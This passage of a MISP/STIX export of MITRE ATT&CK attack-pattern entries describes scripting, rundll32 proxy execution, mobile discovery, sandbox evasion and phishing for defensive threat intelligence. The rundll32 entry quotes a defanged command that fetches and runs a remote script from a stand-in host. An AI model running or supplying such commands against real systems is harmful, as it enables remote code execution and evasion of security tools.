T1064", "description": "ATT&CK Tactic | **This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**\n\nAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. 
Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution to software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or on the user agreeing to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Scripting - T1064\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1064"}]}, {"type": "attack-pattern", "id": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Rundll32 - T1085", "description": "ATT&CK Tactic | The rundll32.exe program can be called to execute an arbitrary binary. 
Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1085"}]}, {"type": "attack-pattern", "id": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "File and Directory Discovery - T1420", "description": "ATT&CK Tactic | On Android, command line tools or the Java file APIs can be used to enumerate file system contents. However, Linux file permissions and SELinux policies generally strongly restrict what can be accessed by apps (without taking advantage of a privilege escalation exploit). 
The contents of the external storage directory are generally visible, which could present concern if sensitive data is inappropriately stored there.\n\niOS's security architecture generally restricts the ability to perform file and directory discovery without use of escalated privileges.", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"File and Directory Discovery - T1420\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1420"}]}, {"type": "attack-pattern", "id": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Process Discovery - T1424", "description": "ATT&CK Tactic | On Android versions prior to 5, applications can observe information about other processes that are running through methods in the ActivityManager class. On Android versions prior to 7, applications can obtain this information by executing the <code>ps</code> command, or by examining the <code>/proc</code> directory. 
Starting in Android version 7, use of the Linux kernel's <code>hidepid</code> feature prevents applications (without escalated privileges) from accessing this information (Citation: Android-SELinuxChanges).", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Process Discovery - T1424\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1424"}]}, {"type": "attack-pattern", "id": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "System Information Discovery - T1426", "description": "ATT&CK Tactic | An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, and architecture.\n\nOn Android, much of this information is programmatically accessible to applications through the android.os.Build class.(Citation: Android-Build)\n\nOn iOS, techniques exist for applications to programmatically access this information.(Citation: StackOverflow-iOSVersion)", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"System Information Discovery - T1426\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1426"}]}, {"type": "attack-pattern", "id": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Virtualization/Sandbox Evasion - T1497", "description": "ATT&CK Tactic | Adversaries may employ various means to detect and avoid virtualization and analysis environments. 
This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Virtualization/Sandbox Evasion - T1497\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1497"}]}, {"type": "attack-pattern", "id": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Phishing - T1566", "description": "ATT&CK Tactic | Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. 
In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Phishing - T1566\""], "external_references": [{"source_name": "capec", "external_id": "CAPEC-98"}]}]}